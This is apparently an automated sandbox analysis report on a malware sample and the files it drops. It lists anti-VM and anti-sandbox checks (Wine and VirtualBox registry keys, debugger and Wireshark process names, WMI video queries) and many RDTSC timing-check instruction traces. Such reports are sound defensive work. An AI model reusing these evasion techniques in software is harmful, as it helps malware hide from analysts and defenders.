Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: vUcZzNWkKc.exe, vUcZzNWkKc.exe, 00000000.00000003.1703263673.0000000005100000.00000004.00001000.00020000.00000000.sdmp, vUcZzNWkKc.exe, 00000000.00000002.1745528277.0000000000612000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: DAA14B second address: DAA14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: DA99AA second address: DA99C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: DA99C3 second address: DA99C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1D771 second address: F1D784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FB8E4E1E3BBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1D784 second address: F1D794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007FB8E4E1A516h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1D794 second address: F1D798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1DA27 second address: F1DA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FB8E4E1A526h 0x0000000b push edi 0x0000000c jmp 00007FB8E4E1A529h 0x00000011 jns 00007FB8E4E1A516h 0x00000017 pop edi 0x00000018 jne 00007FB8E4E1A518h 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1DE5F second address: F1DE64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1DE64 second address: F1DE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1DE75 second address: F1DE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1DE82 second address: F1DEA1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8E4E1A516h 0x00000008 jmp 00007FB8E4E1A520h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F2021C second address: F20263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push edi 0x0000000e jmp 00007FB8E4E1E3C8h 0x00000013 pop edi 0x00000014 jns 00007FB8E4E1E3BCh 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007FB8E4E1E3B8h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F20263 second address: F20268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F202EE second address: F20345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB8E4E1E3B8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 pushad 0x00000022 mov al, 05h 0x00000024 mov dword ptr [ebp+122D194Ah], eax 0x0000002a popad 0x0000002b push 00000000h 0x0000002d mov esi, dword ptr [ebp+122D197Fh] 0x00000033 call 00007FB8E4E1E3B9h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FB8E4E1E3BCh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F20345 second address: F2034B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F2034B second address: F2036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8E4E1E3BDh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FB8E4E1E3BCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F2036D second address: F20377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB8E4E1A516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F20377 second address: F203A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnp 00007FB8E4E1E3C8h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F203A3 second address: F20433 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8E4E1A51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007FB8E4E1A528h 0x00000013 pop eax 0x00000014 je 00007FB8E4E1A51Bh 0x0000001a mov edi, 1C406B3Dh 0x0000001f push 00000003h 0x00000021 mov ecx, esi 0x00000023 mov di, 9930h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FB8E4E1A518h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov di, FB98h 0x00000047 push 00000003h 0x00000049 mov si, dx 0x0000004c call 00007FB8E4E1A519h 0x00000051 pushad 0x00000052 jmp 00007FB8E4E1A527h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F20433 second address: F2046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b ja 00007FB8E4E1E3B6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jnl 00007FB8E4E1E3C0h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push esi 0x00000022 pushad 0x00000023 jmp 00007FB8E4E1E3BBh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F2046D second address: F2047D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F2047D second address: F204AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FB8E4E1E3BAh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop eax 0x0000000e mov cx, si 0x00000011 or dword ptr [ebp+122D2C31h], ebx 0x00000017 lea ebx, dword ptr [ebp+1244A137h] 0x0000001d mov edx, 0356EDE6h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jg 00007FB8E4E1E3B6h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F204AF second address: F204B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F204B3 second address: F204B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F20620 second address: F2062E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FB8E4E1A516h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F20789 second address: F20815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122D2F88h], ecx 0x00000010 call 00007FB8E4E1E3C1h 0x00000015 adc cx, 7DD6h 0x0000001a pop edi 0x0000001b push 00000003h 0x0000001d mov esi, dword ptr [ebp+122D2A3Fh] 0x00000023 mov dword ptr [ebp+122D2C31h], ecx 0x00000029 push 00000000h 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FB8E4E1E3B8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 call 00007FB8E4E1E3C7h 0x0000004c add di, 02A5h 0x00000051 pop edi 0x00000052 push ecx 0x00000053 mov si, 3831h 0x00000057 pop edi 0x00000058 push 5CE912DEh 0x0000005d push edi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F20815 second address: F20819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F20819 second address: F2081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F2081D second address: F20860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 6316ED22h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB8E4E1A518h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 lea ebx, dword ptr [ebp+1244A14Bh] 0x0000002e sub dx, 1D48h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push edi 0x00000038 pop edi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F33913 second address: F33919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F33919 second address: F3391D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F3391D second address: F33921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F42590 second address: F42596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F42596 second address: F425A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB8E4E1E3BEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F425A8 second address: F425BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FB8E4E1A516h 0x0000000b jnp 00007FB8E4E1A516h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F425BE second address: F425C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F425C2 second address: F425C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F40465 second address: F4047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F405C7 second address: F405D4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4089A second address: F408AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnc 00007FB8E4E1E3B6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F408AF second address: F408B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F409CC second address: F409D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F40B43 second address: F40B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F40B48 second address: F40B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F40B4E second address: F40B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F40CBE second address: F40CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jne 00007FB8E4E1E3B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4110C second address: F41113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41113 second address: F41118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41118 second address: F41124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB8E4E1A516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4125A second address: F4125E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4125E second address: F41278 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8E4E1A521h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41278 second address: F4128A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4128A second address: F41292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41292 second address: F41296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41296 second address: F412A0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1A516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41725 second address: F41738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41738 second address: F4173C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41CAC second address: F41CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8E4E1E3C3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41CC6 second address: F41CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41CE6 second address: F41CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41CEA second address: F41D11 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB8E4E1A529h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41D11 second address: F41D36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3C4h 0x00000007 jns 00007FB8E4E1E3B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F41ED7 second address: F41EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4240C second address: F42428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1E3C8h 0x00000009 rdtsc
